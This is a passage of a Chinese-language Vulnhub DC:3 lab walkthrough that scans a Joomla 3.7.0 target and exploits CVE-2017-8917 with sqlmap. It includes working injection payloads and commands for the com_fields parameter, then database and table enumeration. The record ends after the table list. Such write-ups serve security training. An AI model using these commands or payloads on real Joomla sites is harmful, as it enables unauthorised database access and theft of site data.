DC:3

简介

Vulnhub DC 系列第三台机子。主要是对Joomla CMS的渗透。

信息收集

┌──(kali㉿kali)-[~/vulnhub/DC/3/workSpace]
└─$ sudo nmap -sn 192.168.56.0/24      
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-31 14:52 CST
Nmap scan report for 192.168.56.1
Host is up (0.00021s latency).
MAC Address: 0A:00:27:00:00:08 (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00020s latency).
MAC Address: 08:00:27:B1:3D:71 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.111
Host is up (0.00085s latency).
MAC Address: 08:00:27:AC:D4:38 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.144
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 15.94 seconds
                                                                                             
┌──(kali㉿kali)-[~/vulnhub/DC/3/workSpace]
└─$ sudo nmap -p- --min-rate=10000 192.168.56.111
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-31 14:52 CST
Nmap scan report for 192.168.56.111
Host is up (0.00037s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 08:00:27:AC:D4:38 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 5.91 seconds
                                                                                                       
┌──(kali㉿kali)-[~/vulnhub/DC/3/workSpace]
└─$ sudo nmap -sT -sV -sC -O -p80 192.168.56.111
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-31 14:53 CST
Nmap scan report for 192.168.56.111
Host is up (0.0011s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Home
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-generator: Joomla! - Open Source Content Management
MAC Address: 08:00:27:AC:D4:38 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.91 seconds
                                                                                             
┌──(kali㉿kali)-[~/vulnhub/DC/3/workSpace]
└─$ sudo nmap --script=vuln 192.168.56.111      
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-31 14:55 CST
Nmap scan report for 192.168.56.111
Host is up (0.00038s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
| http-vuln-cve2017-8917: 
|   VULNERABLE:
|   Joomla! 3.7.0 'com_fields' SQL Injection Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-8917
|     Risk factor: High  CVSSv3: 9.8 (CRITICAL) (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
|       An SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers
|       to execute aribitrary SQL commands via unspecified vectors.
|       
|     Disclosure date: 2017-05-17
|     Extra information:
|       User: root@localhost
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8917
|_      https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /administrator/: Possible admin folder
|   /administrator/index.php: Possible admin folder
|   /administrator/manifests/files/joomla.xml: Joomla version 3.7.0
|   /language/en-GB/en-GB.xml: Joomla version 3.7.0
|   /htaccess.txt: Joomla!
|   /README.txt: Interesting, a readme.
|   /bin/: Potentially interesting folder
|   /cache/: Potentially interesting folder
|   /images/: Potentially interesting folder
|   /includes/: Potentially interesting folder
|   /libraries/: Potentially interesting folder
|   /modules/: Potentially interesting folder
|   /templates/: Potentially interesting folder
|_  /tmp/: Potentially interesting folder
| http-internal-ip-disclosure: 
|_  Internal IP Leaked: 127.0.1.1
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.111
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.56.111:80/
|     Form id: login-form
|     Form action: /index.php
|     
|     Path: http://192.168.56.111:80/index.php/component/users/?view=reset&Itemid=101
|     Form id: user-registration
|     Form action: /index.php/component/users/?task=reset.request&Itemid=101
|     
|     Path: http://192.168.56.111:80/index.php/component/users/?view=reset&Itemid=101
|     Form id: login-form
|     Form action: /index.php/component/users/?Itemid=101
|     
|     Path: http://192.168.56.111:80/index.php/2-uncategorised/1-welcome
|     Form id: login-form
|     Form action: /index.php
|     
|     Path: http://192.168.56.111:80/index.php/component/users/?view=remind&Itemid=101
|     Form id: user-registration
|     Form action: /index.php/component/users/?task=remind.remind&Itemid=101
|     
|     Path: http://192.168.56.111:80/index.php/component/users/?view=remind&Itemid=101
|     Form id: login-form
|     Form action: /index.php/component/users/?Itemid=101
|     
|     Path: http://192.168.56.111:80/index.php
|     Form id: login-form
|_    Form action: /index.php
MAC Address: 08:00:27:AC:D4:38 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 321.70 seconds

发现只开了80端口，那说明是要一条路走到黑了。

不过好处是扫描扫出来了存在Joomla! 3.7.0 'com_fields' SQL Injection Vulnerability这个漏洞。说明80端口跑的是基于Joomla搭建的网站且有SQL注入漏洞。

web渗透

那就直接下手。

SQLMAP

按照exp里的利用方式先用sqlmap试试。

┌──(kali㉿kali)-[~/vulnhub/DC/3/workSpace]
└─$ sudo sqlmap -u "http://192.168.56.111/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
        ___
       __H__                                                                                 
 ___ ___[(]_____ ___ ___  {1.7.2#stable}                                                     
|_ -| . [(]     | .'| . |                                                                    
|___|_  [.]_|_|_|__,|  _|                                                                    
      |_|V...       |_|   https://sqlmap.org                                                 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:08:09 /2023-05-31/

[15:08:09] [INFO] fetched random HTTP User-Agent header value 'Opera/9.10 (X11; Linux i386; U; en)' from file '/usr/share/sqlmap/data/txt/user-agents.txt'                                
[15:08:10] [INFO] testing connection to the target URL
[15:08:10] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('460ada11b31d3c5e5ca6e58fd5d3de27=onljp83m4d8...cvdtmls307'). Do you want to use those [Y/n] 
[15:08:16] [INFO] checking if the target is protected by some kind of WAF/IPS
[15:08:16] [INFO] testing if the target URL content is stable
[15:08:16] [INFO] target URL content is stable
[15:08:16] [INFO] heuristic (basic) test shows that GET parameter 'list[fullordering]' might be injectable (possible DBMS: 'MySQL')
[15:08:16] [INFO] testing for SQL injection on GET parameter 'list[fullordering]'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 
[15:08:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:08:18] [WARNING] reflective value(s) found and filtering out
[15:08:21] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[15:08:23] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
[15:08:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'                                                                                         
[15:08:27] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (subquery - comment)'                                                                                          
[15:08:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[15:08:30] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (comment)'
[15:08:31] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - comment)'
[15:08:32] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[15:08:32] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[15:08:32] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
[15:08:33] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[15:08:33] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
[15:08:33] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[15:08:35] [INFO] testing 'Generic inline queries'
[15:08:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[15:08:36] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[15:08:37] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'                                                                                         
[15:08:38] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'                                                                                  
[15:08:40] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'                                                                         
[15:08:42] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'                                                                          
[15:08:44] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'                                                                              
[15:08:46] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'                                                                               
[15:08:48] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'                                                                         
[15:08:50] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'                                                                          
[15:08:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[15:08:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'                                                                                     
[15:08:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[15:08:52] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'                                                                                          
[15:08:52] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[15:08:52] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'                                                                                     
[15:08:52] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[15:08:52] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'                                                                                 
[15:08:52] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[15:08:52] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'                                                                                  
[15:08:52] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[15:08:53] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[15:08:53] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'                                                                   
[15:08:55] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'                                                                                        
[15:08:56] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'                                                                               
[15:08:57] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[15:08:59] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'                                                                       
[15:09:00] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[15:09:01] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'                                                                       
[15:09:03] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[15:09:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'                                                                             
[15:09:06] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'                                                                              
[15:09:07] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'                                                                      
[15:09:09] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'                                                                       
[15:09:10] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'                                                                         
[15:09:12] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'                                                                          
[15:09:13] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'                                                                             
[15:09:14] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[15:09:16] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[15:09:16] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[15:09:17] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[15:09:17] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[15:09:17] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[15:09:17] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[15:09:17] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[15:09:17] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[15:09:17] [INFO] GET parameter 'list[fullordering]' is 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)' injectable                                                             
[15:09:17] [INFO] testing 'MySQL inline queries'
[15:09:18] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[15:09:18] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[15:09:18] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[15:09:18] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[15:09:18] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[15:09:18] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[15:09:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[15:09:18] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[15:09:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[15:09:18] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[15:09:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[15:09:18] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[15:09:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[15:09:18] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[15:09:18] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)'
[15:09:18] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query)'
[15:09:18] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK)'
[15:09:18] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query)'
[15:09:18] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK - comment)'
[15:09:18] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query - comment)'
[15:09:18] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment)'
[15:09:18] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query - comment)'
[15:09:18] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[15:09:18] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[15:09:18] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[15:09:18] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[15:09:18] [INFO] testing 'MySQL AND time-based blind (ELT)'
[15:09:18] [INFO] testing 'MySQL OR time-based blind (ELT)'
[15:09:18] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[15:09:18] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[15:09:18] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'                                                                                
[15:09:18] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'                                                                      
[15:09:18] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[15:09:18] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'                                                                                           
[15:09:29] [INFO] GET parameter 'list[fullordering]' appears to be 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)' injectable                                       
[15:09:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:09:29] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[15:09:29] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[15:09:30] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[15:09:30] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[15:09:31] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[15:09:31] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'
[15:09:32] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'
[15:09:32] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'
[15:09:33] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'
[15:09:33] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'
[15:09:34] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[15:09:34] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[15:09:35] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[15:09:35] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[15:09:36] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[15:09:36] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[15:09:37] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[15:09:38] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[15:09:38] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[15:09:39] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
GET parameter 'list[fullordering]' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 2716 HTTP(s) requests:
---
Parameter: list[fullordering] (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(8824,CONCAT(0x2e,0x717a627071,(SELECT (ELT(8824=8824,1))),0x716a7a6b71),6230))

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 8632 FROM (SELECT(SLEEP(5)))WmsI)
---
[15:09:51] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.10 or 16.04 (xenial or yakkety)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.1
[15:09:51] [INFO] fetching database names
[15:09:51] [INFO] retrieved: 'information_schema'
[15:09:51] [INFO] retrieved: 'joomladb'
[15:09:51] [INFO] retrieved: 'mysql'
[15:09:51] [INFO] retrieved: 'performance_schema'
[15:09:51] [INFO] retrieved: 'sys'
available databases [5]:
[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys

[15:09:51] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2675 times
[15:09:51] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.111'                                                                               

[*] ending @ 15:09:51 /2023-05-31/

                                                                                             
┌──(kali㉿kali)-[~/vulnhub/DC/3/workSpace]
└─$ sudo sqlmap -u "http://192.168.56.111/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --random-agent -D joomladb --tables
        ___
       __H__                                                                                 
 ___ ___[(]_____ ___ ___  {1.7.2#stable}                                                     
|_ -| . [.]     | .'| . |                                                                    
|___|_  [,]_|_|_|__,|  _|                                                                    
      |_|V...       |_|   https://sqlmap.org                                                 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:10:42 /2023-05-31/

[15:10:42] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.43 Safari/525.19' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[15:10:42] [INFO] resuming back-end DBMS 'mysql' 
[15:10:42] [INFO] testing connection to the target URL
[15:10:42] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('460ada11b31d3c5e5ca6e58fd5d3de27=gdur4j5rk68...ce25ghi8c2'). Do you want to use those [Y/n] 
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: list[fullordering] (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(8824,CONCAT(0x2e,0x717a627071,(SELECT (ELT(8824=8824,1))),0x716a7a6b71),6230))

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 8632 FROM (SELECT(SLEEP(5)))WmsI)
---
[15:10:44] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.1
[15:10:44] [INFO] fetching tables for database: 'joomladb'
[15:10:44] [INFO] retrieved: '#__assets'
[15:10:45] [INFO] retrieved: '#__associations'
[15:10:45] [INFO] retrieved: '#__banner_clients'
[15:10:45] [INFO] retrieved: '#__banner_tracks'
[15:10:45] [INFO] retrieved: '#__banners'
[15:10:45] [INFO] retrieved: '#__bsms_admin'
[15:10:45] [INFO] retrieved: '#__bsms_books'
[15:10:45] [INFO] retrieved: '#__bsms_comments'
[15:10:45] [INFO] retrieved: '#__bsms_locations'
[15:10:45] [INFO] retrieved: '#__bsms_mediafiles'
[15:10:45] [INFO] retrieved: '#__bsms_message_typ'
[15:10:45] [INFO] retrieved: '#__bsms_podcast'
[15:10:45] [INFO] retrieved: '#__bsms_series'
[15:10:45] [INFO] retrieved: '#__bsms_servers'
[15:10:45] [INFO] retrieved: '#__bsms_studies'
[15:10:45] [INFO] retrieved: '#__bsms_studytopics'
[15:10:45] [INFO] retrieved: '#__bsms_teachers'
[15:10:45] [INFO] retrieved: '#__bsms_templatecod'
[15:10:45] [INFO] retrieved: '#__bsms_templates'
[15:10:45] [INFO] retrieved: '#__bsms_timeset'
[15:10:45] [INFO] retrieved: '#__bsms_topics'
[15:10:45] [INFO] retrieved: '#__bsms_update'
[15:10:45] [INFO] retrieved: '#__categories'
[15:10:45] [INFO] retrieved: '#__contact_details'
[15:10:45] [INFO] retrieved: '#__content'
[15:10:45] [INFO] retrieved: '#__content_frontpag'
[15:10:45] [INFO] retrieved: '#__content_rating'
[15:10:45] [INFO] retrieved: '#__content_types'
[15:10:45] [INFO] retrieved: '#__contentitem_tag_'
[15:10:45] [INFO] retrieved: '#__core_log_searche'
[15:10:45] [INFO] retrieved: '#__extensions'
[15:10:46] [INFO] retrieved: '#__fields'
[15:10:46] [INFO] retrieved: '#__fields_categorie'
[15:10:46] [INFO] retrieved: '#__fields_groups'
[15:10:46] [INFO] retrieved: '#__fields_values'
[15:10:46] [INFO] retrieved: '#__finder_filters'
[15:10:46] [INFO] retrieved: '#__finder_links'
[15:10:46] [INFO] retrieved: '#__finder_links_ter'
[15:10:46] [INFO] retrieved: '#__finder_links_ter'
[15:10:46] [INFO] retrieved: '#__finder_links_ter'
[15:10:46] [INFO] retrieved: '#__finder_links_ter'
[15:10:46] [INFO] retrieved: '#__finder_links_ter'
[15:10:46] [INFO] retrieved: '#__finder_links_ter'
[15:10:46] [INFO] retrieved: '#__finder_links_ter'
[15:10:46] [INFO] retrieved: '#__finder_links_ter'
[15:10:46] [INFO] retrieved: '#__finder_links_ter'
[15:10:46] [INFO] retrieved: '#__finder_links_ter'
[15:10:46] [INFO] retrieved: '#__finder_links_ter'
[15:10:46] [INFO] retrieved: '#__finder_links_ter'
[15:10:46] [INFO] retrieved: '#__finder_links_ter'
[15:10:46] [INFO] retrieved: '#__finder_links_ter'
[15:10:46] [INFO] retrieved: '#__finder_links_ter'
[15:10:46] [INFO] retrieved: '#__finder_links_ter'
[15:10:46] [INFO] retrieved: '#__finder_taxonomy'
[15:10:46] [INFO] retrieved: '#__finder_taxonomy_'
[15:10:46] [INFO] retrieved: '#__finder_terms'
[15:10:46] [INFO] retrieved: '#__finder_terms_com'
[15:10:46] [INFO] retrieved: '#__finder_tokens'
[15:10:46] [INFO] retrieved: '#__finder_tokens_ag'
[15:10:46] [INFO] retrieved: '#__finder_types'
[15:10:46] [INFO] retrieved: '#__jbsbackup_timese'
[15:10:46] [INFO] retrieved: '#__jbspodcast_times'
[15:10:46] [INFO] retrieved: '#__languages'
[15:10:46] [INFO] retrieved: '#__menu'
[15:10:46] [INFO] retrieved: '#__menu_types'
[15:10:47] [INFO] retrieved: '#__messages'
[15:10:47] [INFO] retrieved: '#__messages_cfg'
[15:10:47] [INFO] retrieved: '#__modules'
[15:10:47] [INFO] retrieved: '#__modules_menu'
[15:10:47] [INFO] retrieved: '#__newsfeeds'
[15:10:47] [INFO] retrieved: '#__overrider'
[15:10:47] [INFO] retrieved: '#__postinstall_mess'
[15:10:47] [INFO] retrieved: '#__redirect_links'
[15:10:47] [INFO] retrieved: '#__schemas'
[15:10:47] [INFO] retrieved: '#__session'
[15:10:47] [INFO] retrieved: '#__tags'
[15:10:47] [INFO] retrieved: '#__template_styles'
[15:10:47] [INFO] retrieved: '#__ucm_base'
[15:10:47] [INFO] retrieved: '#__ucm_content'
[15:10:47] [INFO] retrieved: '#__ucm_history'
[15:10:47] [INFO] retrieved: '#__update_sites'
[15:10:47] [INFO] retrieved: '#__update_sites_ext'
[15:10:47] [INFO] retrieved: '#__updates'
[15:10:47] [INFO] retrieved: '#__user_keys'
[15:10:47] [INFO] retrieved: '#__user_notes'
[15:10:47] [INFO] retrieved: '#__user_profiles'
[15:10:47] [INFO] retrieved: '#__user_usergroup_m'
[15:10:47] [INFO] retrieved: '#__usergroups'
[15:10:47] [INFO] retrieved: '#__users'
[15:10:47] [INFO] retrieved: '#__utf8_conversion'
[15:10:47] [INFO] retrieved: '#__viewlevels'
Database: joomladb
[76 tables]
+---------------------+
| #__assets           |
| #__associations     |
| #__banner_clients   |
| #__banner_tracks    |
| #__banners          |
| #__bsms_admin       |
| #__bsms_books       |
| #__bsms_comments    |
| #__bsms_locations   |
| #__bsms_mediafiles  |
| #__bsms_message_typ |
| #__bsms_podcast     |
| #__bsms_series      |
| #__bsms_servers     |
| #__bsms_studies     |
| #__bsms_studytopics |
| #__bsms_teachers    |
| #__bsms_templatecod |
| #__bsms_templates   |
| #__bsms_timeset     |
| #__bsms_topics      |
| #__bsms_update      |
| #__categories       |
| #__contact_details  |
| #__content_frontpag |
| #__content_rating   |
| #__content_types    |
| #__content          |
| #__contentitem_tag_ |
| #__core_log_searche |
| #__extensions       |
| #__fields_categorie |
| #__fields_groups    |
| #__fields_values    |
| #__fields           |
| #__finder_filters   |
| #__finder_links_ter |
| #__finder_links     |
| #__finder_taxonomy_ |
| #__finder_taxonomy  |
| #__finder_terms_com |
| #__finder_terms     |
| #__finder_tokens_ag |
| #__finder_tokens    |
| #__finder_types     |
| #__jbsbackup_timese |
| #__jbspodcast_times |
| #__languages        |
| #__menu_types       |
| #__menu             |
| #__messages_cfg     |
| #__messages         |
| #__modules_menu     |
| #__modules          |
| #__newsfeeds        |
| #__overrider        |
| #__postinstall_mess |
| #__redirect_links   |
| #__schemas          |
| #__session          |
| #__tags             |
| #__template_styles  |
| #__ucm_base         |
| #__ucm_content      |
| #__ucm_history      |
| #__update_sites_ext |
| #__update_sites     |
| #__updates          |
| #__user_keys        |
| #__user_notes       |
| #__user_profiles    |
| #__user_usergroup_m |
| #__usergroups       |
| #__users            |
| #__utf8_conversion  |
